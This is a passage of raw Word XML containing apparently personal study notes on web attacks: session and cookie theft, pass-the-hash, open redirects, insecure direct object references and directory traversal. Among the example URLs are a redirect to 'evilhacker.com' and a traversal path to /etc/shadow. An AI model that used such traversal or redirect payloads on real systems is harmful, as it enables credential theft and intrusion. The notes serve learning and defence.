      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Session Attacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F1DAC6" w14:textId="1D4C5D03" w:rsidR="0020168F" w:rsidRDefault="00690CD1" w:rsidP="0020168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Doesn’t steal </w:t>
      </w:r>
      <w:r w:rsidR="00C3109B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>credentials but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> steals an existing authenticated session. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ABEE06" w14:textId="34874CA2" w:rsidR="00C3109B" w:rsidRDefault="00C3109B" w:rsidP="00C3109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Most websites that require authentication</w:t>
      </w:r>
      <w:r w:rsidR="00516E6E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> manage user sessions using cookies managed in the user’s browser and transmitted as part of the HTTP header information provided by a website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCC924A" w14:textId="73FE1310" w:rsidR="006C6208" w:rsidRDefault="006C6208" w:rsidP="006C6208">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w:t>
      </w:r>
      <w:r w:rsidR="00DE68FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">he cookies are given to the user initially after </w:t>
      </w:r>
      <w:r w:rsidR="00D223DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>authentication and</w:t>
      </w:r>
      <w:r w:rsidR="00DE68FC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to help the user store data and </w:t>
      </w:r>
      <w:r w:rsidR="007E5119">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>prove to the web server they are authenticated by storing an authentication string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D2265D" w14:textId="6BC0103D" w:rsidR="008F0D01" w:rsidRDefault="008F0D01" w:rsidP="008F0D01">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Thus, if that cookie is stolen, it can be used to impersonate a user </w:t>
      </w:r>
      <w:r w:rsidR="00700383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and certify that they have already been authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ECAFF0" w14:textId="730EA019" w:rsidR="00D223DB" w:rsidRPr="00E9039E" w:rsidRDefault="00D223DB" w:rsidP="00D223DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cookie Stealing and Manipulation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4543B6" w14:textId="6055ED10" w:rsidR="00D223DB" w:rsidRDefault="00007041" w:rsidP="00D223D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Cookies can be stolen by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFDDEE2" w14:textId="25D09BCC" w:rsidR="00007041" w:rsidRDefault="00007041" w:rsidP="00007041">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Eavesdropping on unencrypted network connections and stealing a copy of the cookie as it is transmitted between the user and the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437F348B" w14:textId="3A602CAD" w:rsidR="00007041" w:rsidRDefault="00D96568" w:rsidP="00007041">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Installing malware on the user’s browser that retrieves cookies and transmits them back to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D33DC5" w14:textId="3FF3D01B" w:rsidR="00D96568" w:rsidRDefault="00D96568" w:rsidP="00007041">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Engaging in a man-in-the-middle attack, where the attack fools the user into thinking the attack is actually the target website and presenting a fake authentication form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340978E9" w14:textId="26B58874" w:rsidR="004F74BF" w:rsidRDefault="004F74BF" w:rsidP="004F74BF">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The attack may then authenticate to the website on behalf of the user to obtain the cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD1DDF" w14:textId="1E95E175" w:rsidR="00F94FB6" w:rsidRPr="00E9039E" w:rsidRDefault="00F94FB6" w:rsidP="00F94FB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Session Replay Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA35C60" w14:textId="098A19F6" w:rsidR="00F94FB6" w:rsidRDefault="00F94FB6" w:rsidP="00F94FB6">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Once attackers have obtained a cookie, they may perform cookie manipulation to alter the details sent back to the website or simply use the cookie as the badge required to gain access to the site. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5928ACF8" w14:textId="22FE0125" w:rsidR="00424348" w:rsidRDefault="00511203" w:rsidP="00F94FB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E4471">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NTLM pass-the-hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack is a form of replay attack that takes place against the operating system rather than a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C223BD6" w14:textId="051988ED" w:rsidR="00BA71C5" w:rsidRDefault="00BA71C5" w:rsidP="00BA71C5">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Attacker begins by gaining access to a Windows system and then harvests stored NTLM password hashes from that system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C537820" w14:textId="054F6ECB" w:rsidR="00E40969" w:rsidRDefault="00E40969" w:rsidP="00BA71C5">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They can then attempt to use the hashes to gain user or admin access to the system or other systems in the same Active Directory Domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790917B6" w14:textId="2FDBD0D4" w:rsidR="00EF3161" w:rsidRPr="009B1644" w:rsidRDefault="00EF3161" w:rsidP="00EF3161">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B1644">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web developers can protect against cookie theft by marking cookies wit</w:t>
      </w:r>
      <w:r w:rsidR="00AE2D31" w:rsidRPr="009B1644">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>h the SECURE attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218B0C72" w14:textId="57BAC70A" w:rsidR="00AE2D31" w:rsidRDefault="009B7800" w:rsidP="00AE2D31">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Secure Cookies are never transmitted over unencrypted HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00EF525E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>connections,</w:t>
      </w:r>
      <w:r w:rsidR="00AB09C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and this is enforced by both servers and web browsers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DFA3C" w14:textId="6D785F2A" w:rsidR="008E587F" w:rsidRPr="00E9039E" w:rsidRDefault="00C95634" w:rsidP="00522B2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E9039E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Unvalidated Redirects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD7C56D" w14:textId="2CE33F31" w:rsidR="00C95634" w:rsidRDefault="004B5D57" w:rsidP="00522B2A">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Insecure URL redirects be used to attempt to steal user sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F09471" w14:textId="0487CF60" w:rsidR="00C10024" w:rsidRDefault="00C10024" w:rsidP="00522B2A">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Some web applications allow the browser to pass destination URLs to the application and then redirect the user to that URL at the completion of their transaction</w:t>
      </w:r>
      <w:r w:rsidR="00EC1082">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5E9433" w14:textId="493212C7" w:rsidR="00EC1082" w:rsidRDefault="00EC1082" w:rsidP="00EC1082">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This can be helpful for </w:t>
      </w:r>
      <w:r w:rsidR="00C773FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web developers as they can redirect users without altering the application’s code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F176B4" w14:textId="43699AB8" w:rsidR="007C3750" w:rsidRDefault="00000000" w:rsidP="007C3750">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00F9281E" w:rsidRPr="00ED62EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.mc.com.php?redirect=http%3a//www.terraria.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4B8F564D" w14:textId="046911C3" w:rsidR="00CD6665" w:rsidRDefault="00CD6665" w:rsidP="00CD6665">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This is a good link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0DCF87" w14:textId="48678692" w:rsidR="00C773FB" w:rsidRDefault="00C773FB" w:rsidP="00EC1082">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However, if not regulated</w:t>
      </w:r>
      <w:r w:rsidR="005974E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, an </w:t>
      </w:r>
      <w:r w:rsidR="005974E5" w:rsidRPr="001C7969">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>unvalidated redirect</w:t>
      </w:r>
      <w:r w:rsidR="005974E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be created </w:t>
      </w:r>
      <w:r w:rsidR="001C7969">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>which inserts a URL to a malicious website instead of a legitimate one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6992F2" w14:textId="6EC11F41" w:rsidR="00CD6665" w:rsidRDefault="00000000" w:rsidP="00CD6665">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00F9281E" w:rsidRPr="00ED62EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.mc.com.php?redirect=http%3a//www.evilhacker.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="34AD0B37" w14:textId="08B345B8" w:rsidR="00F9281E" w:rsidRDefault="00F9281E" w:rsidP="00F9281E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This is a bad link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF30270" w14:textId="5055C3D7" w:rsidR="001852E3" w:rsidRDefault="001852E3" w:rsidP="00EC1082">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Thus, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F94287">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>validated redirects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> should be made where a list of approved </w:t>
      </w:r>
      <w:r w:rsidR="00F94287">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URLs</w:t>
      </w:r>
      <w:r w:rsidR="0088080F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (can be specific or even a domain)</w:t>
      </w:r>
      <w:r w:rsidR="00F94287">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is made to prevent this feature from being abused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189A852A" w14:textId="186D1968" w:rsidR="00F33217" w:rsidRPr="00AE4D42" w:rsidRDefault="008608F8" w:rsidP="008608F8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE4D42">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Exploiting Authorization Vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09730315" w14:textId="71E89A23" w:rsidR="008608F8" w:rsidRDefault="00C50457" w:rsidP="00950A9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is how attackers exceed the level of access they are authorized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D6EC6" w14:textId="7046A747" w:rsidR="00C50457" w:rsidRPr="00950A91" w:rsidRDefault="00C50457" w:rsidP="00950A91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00950A91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Insecure Direct Object References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B66C4EC" w14:textId="263D5DA5" w:rsidR="00C50457" w:rsidRDefault="00132390" w:rsidP="00950A9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In some cases, </w:t>
      </w:r>
      <w:r w:rsidR="000D7D50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>web developers design an application to directly retrieve information from a database based on an argument provided by the user in either a query string or a POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641AC941" w14:textId="5D0DF887" w:rsidR="000D7D50" w:rsidRDefault="000D7D50" w:rsidP="00950A9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Can be seen like: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00B42E3B" w:rsidRPr="00ED62EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.mc.com/getDocument.php?docID=1842</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E350481" w14:textId="48A2A8FD" w:rsidR="00B42E3B" w:rsidRDefault="00805EB0" w:rsidP="00950A9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In general, this is okay as long as the application implements other authorization mechanisms</w:t>
      </w:r>
      <w:r w:rsidR="00D61016">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C166D3D" w14:textId="2F95227B" w:rsidR="00D61016" w:rsidRDefault="00D61016" w:rsidP="00950A91">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If not, they can do docID=1843 or 1844 which can eventually lead to an attacker retrieving </w:t>
      </w:r>
      <w:r w:rsidR="00950A91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>information they should not be seeing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23378E" w14:textId="5A924EDA" w:rsidR="00950A91" w:rsidRPr="001A77C8" w:rsidRDefault="00581A43" w:rsidP="00950A91">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Directory Traversal</w:t>
      </w:r>
      <w:r w:rsidR="00E579DD" w:rsidRPr="001A77C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E721A2" w14:textId="287ABFD5" w:rsidR="00E579DD" w:rsidRDefault="00E579DD" w:rsidP="00E579D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Some web servers suffer from a security misconfiguration that allows users to navigate the directory </w:t>
      </w:r>
      <w:r w:rsidR="00505528">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>structure and access files that should remain secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08195C99" w14:textId="46ED7B76" w:rsidR="00505528" w:rsidRDefault="00505528" w:rsidP="0050552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These attacks work when web servers allow the inclusion of operators that navigate directory paths and filesystem access controls don’t properly restrict access to files stored elsewhere on the server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1FDF63" w14:textId="4BF39F30" w:rsidR="003C2177" w:rsidRDefault="003C2177" w:rsidP="0050552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This can be seen from </w:t>
      </w:r>
      <w:r w:rsidR="00D441E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>these links:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2E903" w14:textId="5C46228F" w:rsidR="00D441E1" w:rsidRDefault="00000000" w:rsidP="00D441E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00E20D83" w:rsidRPr="00ED62EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.mc.com/account.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08FA7ABA" w14:textId="1DA83484" w:rsidR="00E20D83" w:rsidRDefault="00CB6544" w:rsidP="00D441E1">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Traversing upward to </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00266D6B" w:rsidRPr="00ED62EF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.mc.com.account/../../../etc/shadow</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="643165FE" w14:textId="51A5AA55" w:rsidR="005214E5" w:rsidRDefault="005214E5" w:rsidP="005214E5">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If this was an Apache server, we would have treated the URL almost like a file path since </w:t>
      </w:r>
      <w:r w:rsidR="00266D6B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> kind of is one, then </w:t>
      </w:r>
      <w:r w:rsidR="00266D6B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>travel to the shadow file which stores the shadow password hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531FA43C" w14:textId="05030E1F" w:rsidR="0059136C" w:rsidRPr="001A77C8" w:rsidRDefault="0059136C" w:rsidP="0059136C">
      <w:pPr>
